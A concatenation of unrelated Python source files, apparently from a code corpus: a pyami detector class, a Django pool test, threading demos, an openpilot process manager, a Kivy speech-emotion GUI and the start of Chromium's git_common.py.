The data will be in the form of an accumulated mean, rms, and number
of entries used in the calculations. The raw data is not available via
pyami.
This only supports scalars. The array features are known to crash both the
python session and active ami clients, so don't use them.
Parameters
----------
prefix: ``str``
The ami name to use to retrieve the data.
name: ``str``, required keyword
The shorter name to use to label the data.
filter_str: ``str``, optional
If provided, we'll filter the incoming data using this filter string.
If omitted or None, we'll use the last set_l3t string.
If False, but not None, we'll do no filtering at all. This includes the
empty string.
min_duration: ``float``, optional
If provided, we'll wait this many seconds before declaring the
acquisition as complete. Otherwise, we'll stop acquiring on read.
normalize: ``bool`` or ``AmiDet``, optional
Determines the normalization behavior of this detector. The default is
``True``, which means normalize to the current ``monitor_det``. See
`set_monitor_det`. ``False`` means do not normalize. You can also pass
in any other detector to normalize against something that is not the
``monitor_det``.
"""
mean = Cpt(Signal, value=0., kind='hinted')
err = Cpt(Signal, value=0., kind='hinted')
entries = Cpt(Signal, value=0, kind='normal')
mean_raw = Cpt(Signal, value=0., kind='normal')
err_raw = Cpt(Signal, value=0., kind='normal')
mean_mon = Cpt(Signal, value=0., kind='normal')
err_mon = Cpt(Signal, value=0., kind='normal')
entries_mon = Cpt(Signal, value=0., kind='normal')
mon_prefix = Cpt(Signal, value='', kind='normal')
rms = Cpt(Signal, value=0., kind='omitted')
def __init__(self, prefix, *, name, filter_string=None, min_duration=0,
normalize=True):
auto_setup_pyami()
self._entry = None
self._monitor = None
self.filter_string = filter_string
self.min_duration = min_duration
self.normalize = normalize
super().__init__(prefix, name=name)
def stage(self):
"""
Called early in a bluesky scan to initialize the pyami.Entry object.
Note that pyami.Entry objects begin accumulating data immediately.
This is when the filter_string is used to determine how to filter
the pyami data. Setting the filter_string after stage is called will
have no effect.
Internally this creates a new pyami.Entry object. These objects start
accumulating data immediately.
"""
if self.filter_string is None and last_filter_string is not None:
self._entry = pyami.Entry(self.prefix, 'Scalar',
last_filter_string)
elif self.filter_string:
self._entry = pyami.Entry(self.prefix, 'Scalar',
self.filter_string)
else:
self._entry = pyami.Entry(self.prefix, 'Scalar')
if self.normalize:
if isinstance(self.normalize, AmiDet):
self._monitor = self.normalize
else:
self._monitor = monitor_det
if self._monitor is not None:
self.mon_prefix.put(self._monitor.prefix)
return super().stage()
def unstage(self):
"""
Called late in a bluesky scan to remove the pyami.Entry object and the
monitor.
"""
self._entry = None
if self._monitor is not None and self._monitor is not self:
self._monitor.unstage()
unstaged = super().unstage() + [self._monitor]
else:
unstaged = super().unstage()
self._monitor = None
self.mon_prefix.put('')
return unstaged
def trigger(self):
"""
Called during a bluesky scan to clear the accumulated pyami data.
This must be done because the pyami.Entry objects continually
accumulate data forever. You can stop it by deleting the objects
as in `unstage`, and you can clear it here to at least start from a
clean slate.
If min_duration is zero, this will return a status already marked done
and successful. Otherwise, this will return a status that will be
marked done after min_duration seconds.
If there is a normalization detector in use and it has not been staged,
it will be staged during the first trigger in a scan.
"""
if self._entry is None:
raise RuntimeError('AmiDet %s(%s) was never staged!'
% (self.name, self.prefix))
if self._monitor is not None and self._monitor is not self:
if self._monitor._staged != Staged.yes:
self._monitor.unstage()
self._monitor.stage()
monitor_status = self._monitor.trigger()
else:
monitor_status = None
self._entry.clear()
if self.min_duration:
def inner(duration, status):
time.sleep(duration)
status.set_finished()
status = Status(obj=self)
Thread(target=inner, args=(self.min_duration, status)).start()
else:
status = Status(obj=self)
status.set_finished()
if monitor_status is None:
return status
else:
return status & monitor_status
def get(self, *args, **kwargs):
self._get_data()
return super().get(*args, **kwargs)
def read(self, *args, **kwargs):
self._get_data()
return super().read(*args, **kwargs)
def _get_data(self):
"""
Helper function that stuffs ami data into this device's signals.
It reads the accumulated values from the pyami.Entry created in `stage`.
"""
if self._entry is None:
raise RuntimeError('Must stage AmiDet to begin accumulating data')
data = self._entry.get()
self.mean_raw.put(data['mean'])
self.rms.put(data['rms'])
self.entries.put(data['entries'])
# Calculate the standard error, as the old python code did
if data['entries']:
data['err'] = data['rms']/np.sqrt(data['entries'])
else:
data['err'] = 0
self.err_raw.put(data['err'])
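# Added note: adj_error below estimates the uncertainty of the normalized
# mean (detector/monitor) by combining the detector and monitor error terms.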
def adj_error(det_mean, det_err, mon_mean, mon_err):
return det_err/mon_mean + mon_err * (det_mean/mon_mean)**2
if self._monitor is None:
self.mean.put(data['mean'])
self.err.put(data['err'])
self.mean_mon.put(0)
self.err_mon.put(0)
self.entries_mon.put(0)
elif self._monitor is self:
self.mean.put(1)
if data['mean'] == 0:
self.err.put(np.nan)
else:
self.err.put(adj_error(data['mean'], data['err'],
data['mean'], data['err']))
self.mean_mon.put(data['mean'])
self.err_mon.put(data['err'])
self.entries_mon.put(data['entries'])
else:
mon_data = self._monitor.get()
if mon_data.mean_raw == 0:
self.mean.put(np.nan)
self.err.put(np.nan)
else:
self.mean.put(data['mean']/mon_data.mean_raw)
self.err.put(adj_error(data['mean'], data['err'],
mon_data.mean_raw,
mon_data.err_raw))
self.mean_mon.put(mon_data.mean_raw)
self.err_mon.put(mon_data.err_raw)
self.entries_mon.put(mon_data.entries)
def put(self, *args, **kwargs):
raise ReadOnlyError('AmiDet is read-only')
def set_det_filter(self, *args, event_codes=None, operator='&'):
"""
Set the filter on this detector only.
This lets you override the l3t filter for a single AmiDet. Call with
no arguments to revert to the last l3t filter. Call with a simple
``False`` to disable filtering on this detector. Call as you would to
set the l3t filter to setup a normal filtering override.
Parameters
----------
*args: (``AmiDet``, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. If instead, the first
argument is ``False``, we'll disable filtering on this detector.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when
the event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes.
This can either be ``|`` to ``or`` the conditions together, so
l3pass will happen if any filter passes, or it can be left at the
default ``&`` to ``and`` the conditions together, so l3pass will
only happen if all filters pass.
"""
if len(args) == 1 and not args[0]:
self.filter_string = False
else:
self.filter_string = dets_filter(*args, event_codes=event_codes,
operator=operator)
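# --- Illustrative usage sketch (added note, not part of the original module) ---
# Outside of a bluesky plan an AmiDet can be exercised by hand; the prefix below
# is a placeholder, not a real ami name:
#
#   det = AmiDet('HYPO:SCALAR:01', name='hypo_det', min_duration=1)
#   det.stage()             # creates the pyami.Entry, which starts accumulating
#   status = det.trigger()  # clears the entry; done after min_duration seconds
#   # wait until status reports done, then:
#   print(det.read())       # mean/err/entries, normalized if a monitor is set
#   det.unstage()           # drops the pyami.Entry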
|
tests.py
|
'''
Simplistic test of pooling code
Created on Mar 28, 2013
@author: greg
'''
import random
import threading
n_threads = 6
n_fast_tests = 1000
n_slow_tests = 10
def test_slow_connection(execs_remaining):
print '%s: Test slow %s' % (threading.current_thread().name, n_slow_tests - execs_remaining)
signals.request_started.send(sender=base.BaseHandler)
cursor = connection.cursor()
cursor.execute("SELECT pg_sleep(1)")
signals.request_finished.send(sender=base.BaseHandler)
def test_fast_connection(execs_remaining):
print '%s: Test fast %s' % (threading.current_thread().name, n_fast_tests - execs_remaining)
signals.request_started.send(sender=base.BaseHandler)
cursor = connection.cursor()
cursor.execute("SELECT 1")
row = cursor.fetchone()
assert(row[0] == 1)
signals.request_finished.send(sender=base.BaseHandler)
def test_connection():
l_fast_tests = n_fast_tests
l_slow_tests = n_slow_tests
while l_fast_tests > 0 or l_slow_tests > 0:
if random.randint(0, n_fast_tests + n_slow_tests) < n_slow_tests and l_slow_tests > 0:
test_slow_connection(l_slow_tests)
l_slow_tests -= 1
elif l_fast_tests > 0:
test_fast_connection(l_fast_tests)
l_fast_tests -= 1
if __name__ == '__main__':
from django.core import signals
from django.core.handlers import base
from django.db import connection
print ('Running test_connection in %s threads with %s fast / %s slow loops each. '
'Should take about %s seconds.') % (n_threads, n_fast_tests, n_slow_tests, n_slow_tests)
# Warm up pool
cursor = connection.cursor()
cursor.execute("SELECT 1")
row = cursor.fetchone()
assert(row[0] == 1)
connection.close()
# Take requests in n_threads
for n in range(n_threads):
t = threading.Thread(target=test_connection)
t.start()
|
using_threading_module.py
|
import time
import threading
#create function for thread
def Tfunc(i):
print("Thread no.:%d" % (i+1))
time.sleep(5)
print("%d finished sleeping from thread\n" % i)
#start the thread for function
for i in range(3):
t1 = threading.Thread(target=Tfunc, args=(i,))
t1.start()
#check whether the thread is alive
c=t1.is_alive()
#fetch the name of the thread
c1=t1.name
print('\n',c1,"is Alive:",c)
#get total number of threads in execution
count=threading.active_count()
print("Total No of threads:",count)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \
terms_version, training_version, comma_remote, \
get_git_branch, get_git_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# add
("SshEnabled", "1"),
("LongControlSelect", "0"),
("AutoLaneChangeEnabled", "1"),
("PutPrebuilt", "0"),
("MfcSelect", "0"),
("LateralControlSelect", "0"),
("ShutdowndDisable", "1"),
("LoggerDisable", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("NewRadarInterface", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", version)
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_git_commit(default=""))
params.put("GitBranch", get_git_branch(default=""))
params.put("GitRemote", get_git_remote(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
for p in managed_processes.values():
p.stop()
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
if params.get_bool("ShutdowndDisable"):
not_run.append("shutdownd")
if params.get_bool("LoggerDisable"):
not_run.append("loggerd")
not_run.append("deleter")
not_run.append("logmessaged")
not_run.append("tombstoned")
not_run.append("uploader")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
#if started_prev and not started and 'updated' in managed_processes:
# os.sync()
# managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc]
cloudlog.debug(' '.join(running_list))
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# TODO: let UI handle this
# Exit main loop when uninstall is needed
if params.get_bool("DoUninstall"):
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
if Params().get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
CommandIssue.py
|
import Queue
import threading
class DummyBus:
def __init__(self):
self.CMDqueue = Queue.Queue(1) # arbitrary command queue
self.CMDdaemon = threading.Thread(target=self._issueRoutine, name='Command Issue Routine')
self.CMDdaemon.setDaemon(True)
self.CMDdaemon.start()
self.OUTqueue = Queue.Queue(1) # returned messages queue
return
def close(self):
self.CMDqueue.join()
return
def _issueRoutine(self):
" daemon for commiting commands in commnad queue:"
while True:
task = self.CMDqueue.get()
if task is not None:
command = task[0]
params = task[1]
if command is not None:
if params is None:
command()
else:
command(params)
pass
self.CMDqueue.task_done()
return
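# Minimal usage sketch (added, not part of the original file): tasks are queued
# as (command, params) tuples; _issueRoutine calls command(params), or command()
# when params is None. The demo names below are only for illustration.
if __name__ == '__main__':
    def _demo_command(message=None):
        print 'demo command issued: %s' % message
    bus = DummyBus()
    bus.CMDqueue.put((_demo_command, 'hello'))  # runs command(params)
    bus.CMDqueue.put((_demo_command, None))     # runs command()
    bus.close()  # blocks until the queue has been fully processed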
|
gui_start.py
|
import kivy
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.textinput import TextInput
from kivy.uix.button import Button
from kivy.uix.spinner import Spinner
from kivy.uix.slider import Slider
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.core.window import Window
from kivy.config import Config
import os
import glob
import time
import threading
import speech_recognition as sr
#program python files
import recordmic
import train
import predict
kivy.require('1.11.1') #require version
OPTIONS_FILE = "prevOptions.txt"
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
validFunctions = ['elu', 'softmax', 'selu', 'softplus', 'softsign', 'relu', 'tanh', 'hard_sigmoid', 'sigmoid', 'exponential', 'linear']
#do not forget to remove self.clipName upon exiting the program
Config.set('graphics', 'width', '1000')
Config.set('graphics', 'height', '1000')
Config.write()
def loadModels():
listOfModels = []
for folder in glob.glob(f"{CURRENT_DIR}\\models\\*"):
listOfModels.append(os.path.basename(folder))
return listOfModels
class StartPage(Widget):
def __init__(self, **kwargs):
self.buildLists()
super(StartPage, self).__init__(**kwargs)
#open prev options file
if os.path.isfile(OPTIONS_FILE):
with open(OPTIONS_FILE, "r") as fopt:
opt = fopt.read().split(',') #comma delimiter
def buildLists(self):
self.NN_MODELS = loadModels()
self.DATASETS = ['RAVDESS-TESS', 'RAVDESS', 'TESS', 'RAVDESS-User', 'User']
self.emotionsList = [s.capitalize() for s in train.trainingEmotions]
self.isRecording = False
self.clipName = "tempClip"
def updateModelList(self):
self.ids.modelDropList.values = self.NN_MODELS = loadModels()
def modelChanged(self, spinner, text):
self.modelName = self.ids.modelDropList.text
def recordBtnPress(self, instance):
if self.isRecording:
popupMsg = PopUp()
popupMsg.setText("Your voice is already being recorded.")
popupMsg.open()
return
#check if model is selected, show popup
if self.ids.modelDropList.text not in self.NN_MODELS:
popupMsg = PopUp()
popupMsg.setText("Please select a Neural Network Model to be used for emotion guessing.")
popupMsg.open()
return
#Change colour of Button to indicate recording
self.ids.recordBtn.background_normal = 'icn/mic_red.png'
self.isRecording = True
threading.Thread(target=self.recordMic).start()
def recordMic(self):
tempClipDirectory = f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav"
recordingTime = round(self.ids.recordLengthSlider.value, 1)
recordmic.recordAudio(tempClipDirectory, recordingTime)
self.ids.recordBtn.background_normal = 'icn/mic_blue.png'
#recording ended. Predict emotion using selected model
bestGuess, bestGuessConfidence, secondGuess, secondGuessConfidence = predict.predict(self.ids.modelDropList.text, tempClipDirectory)
if bestGuess is None:
self.ids.recordResultLabel.text = "Model loading failed."
self.isRecording = False
self.ids.recordBtn.background_normal = 'icn/mic_green.png'
return
self.ids.recordResultLabel.text = f"Predicted emotion: {bestGuess.capitalize()} with confidence of {bestGuessConfidence*100:5.2f}% \nNext guess is: {secondGuess.capitalize()} with confidence of {secondGuessConfidence*100:5.2f}%"
self.ids.emotionDropList.text = bestGuess.capitalize()
#speech to text
r = sr.Recognizer()
with sr.AudioFile(tempClipDirectory) as source:
audio = r.record(source)
try:
textTranscript = r.recognize_google(audio)
if len(textTranscript) > 1:
textTranscript = textTranscript.capitalize()
self.ids.recordTranscript.text = f"Transcript: {textTranscript}"
except sr.UnknownValueError:
self.ids.recordTranscript.text = f"Error: Unknown Value"
except sr.RequestError:
self.ids.recordTranscript.text = f"Error: Service is down"
#change back the color
self.ids.recordBtn.background_normal = 'icn/mic_green.png'
self.isRecording = False
def saveClipBtnPress(self, instance):
#retrieve predicted emotion from list
emotion = self.ids.emotionDropList.text
timeStr = time.strftime("%Y.%m.%d_%H.%M.%S")
#rename temp file if exists
if os.path.exists(f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav"):
os.rename(f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav", f"{CURRENT_DIR}\\data\\User\\{timeStr}-{emotion.lower()}.wav")
popupMsg = PopUp()
popupMsg.setText("Voice sample saved.")
popupMsg.open()
def retrainBtnPress(self, instance):
if not self.isRecording:
#open training screen
app.screenManager.current = "Train"
def sliderUpdateLabelValue(self):
value = self.ids.recordLengthSlider.value
self.ids.recordLengthLabel.text = f"{value:.1f} seconds"
class TrainPage(Widget):
def __init__(self, **kwargs):
self.buildLists()
super(TrainPage, self).__init__(**kwargs)
def buildLists(self):
self.NN_MODELS = loadModels()
self.DATASETS = ['RAVDESS-TESS', 'RAVDESS', 'TESS', 'RAVDESS-User', 'User']
self.currentTime = time.strftime("%Y.%m.%d")
#self.learningRates = [10**n *1e-8 for n in range(1, 6)]
self.isTraining = False
def returnBtnPress(self, instance):
app.startPage.updateModelList()
app.screenManager.current = "Start"
def trainBtnPress(self):
if self.isTraining:
popupMsg = PopUp()
popupMsg.setText("Please be patient as the model is being trained. Training depends on the amount of time and the speed of Hard Drive during loading of audio files.")
popupMsg.open()
return
#load settings
modelName = self.ids.modelNameInput.text.rstrip()
dataset = self.ids.datasetTrainList.text
testSplit = self.ids.dataSplitSlider.value
batch = int(self.ids.batchSlider.value)
epochs = int(round(self.ids.epochSlider.value))
activationFunction = self.ids.activationFuncInput.text.rstrip()
learningRate = self.ids.lrSlider.value
layer1 = int(self.ids.layer1Slider.value)
layer2 = int(self.ids.layer2Slider.value)
layer3 = int(self.ids.layer3Slider.value)
#sanitise inputs
if modelName == "":
popupMsg = PopUp()
popupMsg.setText("Must enter a name for your model.")
popupMsg.open()
return
modelName = f"{modelName}-{dataset}"
if modelName in self.NN_MODELS:
popupMsg = PopUp()
popupMsg.setText("Please enter a unique name for your model.\nModel with identical name will overwrite previous.")
popupMsg.open()
return
if dataset not in self.DATASETS:
popupMsg = PopUp()
popupMsg.setText("Please select a Dataset to train the network on.\nDatasets separated by hyphens will be merged before training.")
popupMsg.open()
return
if activationFunction not in validFunctions:
popupMsg = PopUp()
popupMsg.setText("Activation function not valid. Refer to https://keras.io/activations/ for list.")
popupMsg.open()
return
#build config dictionary
self.config = {
'dataset':dataset,
'test_split':testSplit,
'batch_size':batch,
'epochs':epochs,
'activation_function':activationFunction,
'learning_rate':learningRate,
'layer_1': layer1,
'layer_2': layer2,
'layer_3': layer3
}
self.ids.trainBtn.background_normal = 'icn/save_green.png'
self.isTraining = True
threading.Thread(target=self.trainModel).start()
def trainModel(self):
modelName = self.ids.modelNameInput.text.rstrip()
dataset = self.ids.datasetTrainList.text
modelName = f"{modelName}-{dataset}"
epochs = int(self.ids.epochSlider.value)
#pass config to train function
history = train.trainModel(modelName, self.config)
if history is None:
self.ids.trainLabel.text = "Exception caught during training. Please ensure you have tensorflow and keras installed."
self.isTraining = False
self.ids.trainBtn.background_normal = 'icn/save_blue.png'
return
#display validation accuracy for last epoch
accuracy = history['categorical_accuracy'][-1]
valAccuracy = history['val_categorical_accuracy'][-1]
print(valAccuracy)
self.ids.trainLabel.text = f"Training completed after {epochs} epochs: Training accuracy: {accuracy*100:.2f}% Validation Accuracy: {valAccuracy*100:.2f}%\nModel saved at /models/{modelName}"
#reload list of models.
app.startPage.updateModelList()
self.isTraining = False
self.ids.trainBtn.background_normal = 'icn/save_blue.png'
class PopUp(Popup):
def setText(self, text):
self.Text = text
class SREApp(App):
def build(self):
self.screenManager = ScreenManager()
self.startPage = StartPage()
screen = Screen(name="Start")
screen.add_widget(self.startPage)
self.screenManager.add_widget(screen)
self.trainPage = TrainPage()
screen = Screen(name="Train")
screen.add_widget(self.trainPage)
self.screenManager.add_widget(screen)
return self.screenManager
#return StartPage()
if __name__=='__main__':
app = SREApp()
app.run()
#cleanup temp files
if os.path.exists(f"{CURRENT_DIR}\\data\\User\\tempClip.wav"):
os.remove(f"{CURRENT_DIR}\\data\\User\\tempClip.wav")
|
git_common.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
import multiprocessing.pool
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
return func(self, timeout=timeout or 1e100)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import sys
import tempfile
import textwrap
import threading
import subprocess2
from StringIO import StringIO
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
GIT_EXE = ROOT+'\\git.bat' if IS_WIN else 'git'
TEST_MODE = False
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
# Retry a git operation if git returns an error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
Adds the following methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key from the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
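# Illustrative usage sketch (added note, not from the original file):
#
#   with ScopedPool(kind='threads') as pool:
#     results = pool.map(some_fn, items)
#
# The pool is closed and joined on a clean exit, and terminated if the block
# raises, which complements the Ctrl-C handling described at the top of this
# file.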
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
def _inner_gen():
yield function()
while True:
yield
return _inner_gen().next
## Git functions
def die(message, *args):
print >> sys.stderr, textwrap.dedent(message % args)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
